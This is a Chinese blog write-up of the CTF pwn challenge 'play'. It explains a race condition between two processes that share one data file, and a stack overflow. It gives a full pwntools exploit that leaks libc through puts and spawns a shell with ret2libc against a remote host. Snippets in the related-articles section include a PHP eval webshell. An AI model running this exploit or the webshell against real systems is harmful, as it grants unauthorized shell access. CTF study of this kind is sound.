CTF-PWN-play (条件竞争,多进程共享同一数据文件)

最新推荐文章于 2022-10-01 11:20:05 发布
最新推荐文章于 2022-10-01 11:20:05 发布
阅读量827 收藏 3
点赞数
分类专栏: CTF-PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/getsum/article/details/104343017
版权

程序概述

[*] '/home/supergate/Desktop/Pwn/pwn'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

只打开了NX保护,这为我们的攻击带来便利。
在执行主流程之前会先执行一个init函数:

void init()
{
  unsigned int v0; // eax
  char name; // [esp+0h] [ebp-48h]

  v0 = time(0);
  srand(v0);
  init_io();
  if ( access(manager_db, 0) && mkdir(manager_db, 0x1EDu) == -1 )
  {
    perror("mkdir error");
  }
  else
  {
    chdir(manager_db);
    while ( 1 )
    {
      printf("login:");
      read_buff((int)&name, 64, 10);
      if ( (unsigned __int8)check_name(&name) )
        break;
      puts("bad name");
    }
    if ( access(&name, 0) )
    {
      puts("welcome to the system!");
      init_new_db_file(&name);
    }
    else
    {
      puts("welcome back to the system");
    }
    init_db(&name);
    gMonster = (AD_struct *)malloc(0x54u);
    init_monster(0);
    init_hero();
  }
}

即先让用户输入一个login字符串,然后在/tmp/目录下创建一个同名文件。根据后续操作可以知道该文件存的是gHero的相关内容。

主流程就是gHerogMonster互相进行攻防的模拟。可以选择进行攻击,也可以选择修改自己当前的攻击方式。每一种攻击方式的attack,defense,strike值都不相同,以虚表存在.bss段中。
其中attack函数如下图所示,其中AD_struct是我自己根据数据结构定义的一个结构体,方便后续理解,gHerogMonster都是这个结构体的形式。

struct_properties *attack()
{
  struct_properties *result; // eax
  int monster_defense; // [esp+10h] [ebp-18h]
  int monster_attack; // [esp+14h] [ebp-14h]
  int hero_defense; // [esp+18h] [ebp-10h]
  int hero_attack; // [esp+1Ch] [ebp-Ch]

  ++gHero->cnt1;
  ++gMonster->cnt1;
  hero_recovery();
  mon_recovery();
  printf("%s display:%s\n", &gHero->gap3, gHero->properties->method_full_name);
  printf("%s display:%s\n", &gMonster->gap3, gMonster->properties->method_full_name);
  monster_attack = gMonster->properties->attack;
  monster_defense = gMonster->properties->defense;
  if ( gMonster->properties->strike && gMonster->cnt1 > 4 && rand() % 3 == 1 )
  {
    gMonster->cnt1 = 0;
    monster_defense += gMonster->properties->strike;
    monster_attack += gMonster->properties->strike;
  }
  hero_attack = gHero->properties->attack;
  hero_defense = gHero->properties->defense;
  if ( gMonster->properties->strike )
  {
    printf("use hiden_methods?(1:yes/0:no):");
    if ( read_int() == 1 )
    {
      hero_defense += gHero->properties->strike;
      hero_attack += gHero->properties->strike;
    }
  }
  if ( hero_defense < monster_attack )
    gHero->surplus -= monster_attack - hero_defense;
  if ( monster_defense < hero_attack )
    gMonster->surplus -= hero_attack - monster_defense;
  if ( gHero->surplus <= 0 )
  {
    puts("you failed");
    gHero->surplus = 0;
    release_all();
  }
  result = (struct_properties *)gMonster->surplus;
  if ( (signed int)result <= 0 )
  {
    puts("you win");
    if ( gMonster->slave_num == 3 )
    {
      puts("we will remember you forever!");
      vul_func();
      release_all();
    }
    puts("slave up");
    level_up();
    result = init_monster(gMonster->slave_num + 1);
  }
  return result;
}

每一次怪物血量降到0及以下时就会升级,打败等级为3级的怪兽就会记录你的名字,然后结束程序。

漏洞分析

vul_func中很显然存在一个栈溢出漏洞,并且是最简单的那种栈溢出。
问题是我们该如何打败三个等级的怪物使得程序运行到这个地方。
由于gHero是存在/tmp/文件夹下我们指定名称的文件内的,所以如果我们打开了两个进程,并且输入的文件名相同,那么这两个进程就会共享同一片内存区域。
对于attack函数的这一段

  hero_attack = gHero->properties->attack;
  hero_defense = gHero->properties->defense;
  if ( gMonster->properties->strike )
  {
    printf("use hiden_methods?(1:yes/0:no):");
    if ( read_int() == 1 )
    {
      hero_defense += gHero->properties->strike;
      hero_attack += gHero->properties->strike;
    }
  }

在p1进程等待read_int()函数输入时,我们就可以打开p2进程,修改攻击方式,从而强化gHero
每种攻击方式的属性如上所说,都在虚表中存着的。应该不只有一种攻击方式。
p2进程修改完之后要记得close,否则p2输了之后可能会带来一些意想不到的错误。

exp

from pwn import *
from LibcSearcher import *
context.log_level='debug'

def change_method(proc,idx):
    proc.sendlineafter(">> ","3")
    proc.sendlineafter(">> ",str(idx))

def hacking(proc):
    proc.sendlineafter(">> ","1")
    proc.sendlineafter(":","1")

p1=remote('111.198.29.45',55333)
elf=ELF('./pwn')
p1.sendlineafter('login:',"name")

while True:
    change_method(p1,3)
    p1.sendlineafter(">> ","1")
    p1.recvuntil(":")

    p2=remote('111.198.29.45',55333)
    p2.sendlineafter('login:',"name")
    change_method(p2,1)
    p1.sendline("1")
    p2.close()
    p1.recvline()
    p1.recvline()
    p1.recvline()
    infom=p1.recvline()
    log.info(infom)
    if "remember" in infom:
	break
    
log.info("Success!")
p1.recvuntil("name:")

vul_addr=0x8048EC7
payload='a'*0x4c+p32(elf.plt['puts'])+p32(vul_addr)+p32(elf.got['puts'])
p1.sendline(payload)
p1.recvuntil("welcome\n")
puts_addr=u32(p1.recv(4).ljust(4,'\x00'))
obj=LibcSearcher('puts',puts_addr)
system_addr=puts_addr-obj.dump("puts")+obj.dump("system")
binsh_addr=puts_addr-obj.dump("puts")+obj.dump("str_bin_sh")

payload='a'*0x4c+p32(system_addr)+p32(0xdeadbeef)+p32(binsh_addr)
p1.sendline(payload)
p1.interactive()
SuperGate
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BurpSuite.zip
02-13
Burp Suite 是用于攻击web 应用程序的集成平台,包含了许多工具。Burp Suite为这些工具设计了许多接口,以加快攻击应用程序的过程。所有工具都共享一个请求,并能处理对应的HTTP 消息、持久性、认证、代理、日志、警报。
Kernel pwn 入门 (3)
CoLin的pwn小屋
07-08 1662
kernel pwn 入门之 ret2dir
攻防世界PWNPlay(条件竞争)题解
seaaseesa的博客
12-19 1770
Play(条件竞争,多进程共享同一数据区域) 首先,检查一下程序的保护机制,很好 然后,我们用IDA分析,发现一个很明显的栈溢出漏洞 但是,要想执行这个漏洞函数,就必须打赢游戏 而,要打赢游戏,就是让*(_DWORD *)(gMonster + 8)的值小于等于0,也就是Host的Surplus要小于等于0 然后,我们看到这里有一个修改(gMonster + 8)值的地方...
Pwn学习日记-1
Tajang的大千世界
12-04 3318
Pwn第一天,其实之前学过,不过今天开始认真系统地学一遍,很多基础的东西看exp都不太明白,确实菜,而且Pwn很帅啊,顺便说一下Zikey Vi老师太强了,讲的很详细,实力也很强! PWN? 概述 破解、利用成功(程序的二进制漏洞) 攻破(设备、服务器) 控制(设备、服务器) 一次简单的hack exploit 用于攻击的脚本与方案 payload 攻击载荷,是对目标进程劫持控制流的数据 shellcode 调用攻击目标shell的代码 二进制基础 程序的编译与链接 从C源代码到可执行文件的生成过
linux kernel pwn学习之条件竞争(一)
seaaseesa的博客
03-04 1718
Linux kernel条件竞争 条件竞争发生在多线程多进程中,往往是因为没有对全局数据、函数进行加锁,导致多进程同时访问修改,使得数据与理想的不一致而引发漏洞。本节,我们从wctf2018-klist这题来分析一下条件竞争制造UAF的利用。 wctf2018-klist 首先,查看一下启动脚本,发现开启了smep机制,说明内核不能直接执行用户空间的代码 qemu-system-x86_...
CTF】web新手练习12题
wxwxwxww的博客
10-01 1113
攻防世界web新手练习12题
CTF练习——WEB安全(BurpSuite为主)
zytjulie的博客
08-22 2664
CTF训练,WEB安全,Burpsuite部分
Kernel pwn 入门 (5)
CoLin的pwn小屋
07-23 927
Kernel pwn 入门之double fetch
攻防世界PWN play 条件竞争漏洞的利用
aptx4869_li的博客
05-26 514
攻防世界PWN-play漏洞利用思路 检查保护机制 healer@healer-virtual-machine:~/Desktop/play$ checksec play [*] '/home/healer/Desktop/play/play' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE
CTF学习笔记22:iwebsec-文件上传漏洞-07-条件竞争文件上传
lifeng_dc的博客
03-18 5768
一、正常上传php文件被删除 你这么暴力,刚上传就删除,解决思路就是不停地上传,你要接收文件、判断文件、删除文件总要时间吧; 那我见缝插针,不停地调用上传的文件,一旦成功就写入另一ma,也就是ma中ma,试一下吧,要用两个burpsuite(双开,哈哈) 二、Attack步骤 (一)准备父上传文件1.php并上传 <?php $f=fopen("7.php","w"); fputs($f,'<?php @eval($_POST[cmd]);?>');?> 该语句在测试过程中卡了很
ctf题库ctf-pwn赛题收集
03-31
ctf题库 CTF(夺旗赛)题库是一个由安全专家和爱好者们制作的一系列网络安全挑战。这些挑战旨在测试各种安全技能,包括密码学、逆向工程、漏洞利用和网络分析等。 CTF题库通常由多个类别的挑战组成,例如Web安全、二...
CTF-Pwn-[BJDCTF 2nd]rci
01-09
CTF-Pwn-[BJDCTF 2nd]rci 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 ...
0ctf-2017-pwn-char
02-05
2017年0ctfpwn题,题目质量还是非常高的,要求做题人需要扎实的shellcode编写能力和ROP链构造能力,下面给出wp链接:https://blog.csdn.net/A951860555/article/details/113666423
CTF-misc工具2-CTF-Tools-masterV1.3.7
08-17
CTF-Tools-master是一个专注于密码编码识别与解码的工具,能自动推断密码的编码类型,并进行解码。 适用人群: 该工具主要适用于参加CTF竞赛的选手,以及对密码编码算法感兴趣的信息安全从业人员。 使用场景: 在CTF竞赛...
0ctf-2017-pwn-char-libc.so
02-05
2017年0ctfpwn题char的libc库文件
CTF-PWN-printf(实验吧|格式化字符漏洞)
SuperGate的博客
02-01 3216
首先运行文件,发现需要输入name,于是打开ida逆向出正确的name,来到了程序主界面。 首先我们先逐一判断函数的用途。put_file是让我们输入文本名称和内容,get_file是让我们输入文本名称,然后程序输出文本内容。show_dir是按照先来后出输出所有的文本名称,并且无缝衔接。 这个时候我们发现get_file函数中显然有一个格式化字符漏洞。 这种漏洞会导致我们可以控制任意内存的...
CTF-PWN-babydriver (linux kernel pwn+UAF)
SuperGate的博客
02-26 2265
第一次接触linux kernal pwn,和传统的pwn题区别较大,需要比较多的前置知识,以及这种题的环境搭建、运行和调试相关的知识。 文章目录Linux内核及内核模块Linux内核(Kernal)内核模块(LKM)iocltstruct credSLUB&SLAB内核态函数题目分析程序概述漏洞分析exp内核调试相关 Linux内核及内核模块 Linux内核(Kernal) 这里只对内...
CTF-PWN-ROPbaby(实验吧)
SuperGate的博客
02-07 1842
学rop的时候刷到的题,感觉很有启发于是就写下来。 本文很大程度上借鉴了如下文章: http://wzt.ac.cn/2018/04/02/ROP/ 进入正题。我们发现题目中给了我们libc的文件,在ropbaby程序中也可以直接查找libc基地址,因此我们就可以不用在主程序中寻找了。 首先我们查看ropbaby文件的保护方式 由于开了NX,shellcode的方式就不好弄了,因此我...
CTF-PWN-HouseOfGrey(栈溢出+maps泄露地址+mem泄露内存)
SuperGate的博客
01-27 1094
程序概述 [*] '/home/supergate/Desktop/Pwn/pwn' Arch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled 查看程序保护后发现保护全开 supergate...
ctfd-pwn赛题收集
最新发布
10-23
ctfd-pwn是一个非常受欢迎的CTF(Capture The Flag)比赛中的一个赛题类型,它主要涉及二进制漏洞的利用和系统安全的挑战。 在ctfd-pwn赛题的收集过程中,通常需要考虑以下几个方面: 1. 题目类型:ctfd-pwn赛题可以包含多种类型的漏洞,例如缓冲区溢出、格式化字符串漏洞、整数溢出等。在收集赛题时需要确保涵盖各种漏洞类型,增加题目的多样性和挑战性。 2. 难度级别:赛题的难度级别应该根据参赛者的水平来确定。可以设置多个难度级别的赛题,包括初级、中级和高级,以便参赛者可以逐步提高自己的技能。 3. 原创性:收集ctfd-pwn赛题时应尽量保持赛题的原创性,避免过多的抄袭或重复的赛题。这有助于增加参赛者的学习价值,同时也能提高比赛的公平性。 4. 实用性:收集的赛题应该具有实际应用的意义,能够模拟真实的漏洞和攻击场景。这样可以帮助参赛者更好地理解和掌握系统安全的基本原理。 5. 文档和解答:为每个收集的赛题准备详细的文档和解答是很有必要的。这些文档包括赛题的描述、利用漏洞的步骤和参考资源等,可以帮助参赛者更好地理解赛题和解题思路。 6. 持续更新:CTF比赛的赛题应该定期进行更新和维护,以适应不断变化的网络安全环境。同时也要根据参赛者的反馈和需求,不断收集新的赛题,提供更好的比赛体验。 综上所述,ctfd-pwn赛题的收集需要考虑赛题类型、难度级别、原创性、实用性、文档和解答的准备,以及持续更新的需求。这样才能提供一个富有挑战性和教育性的CTF比赛平台。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值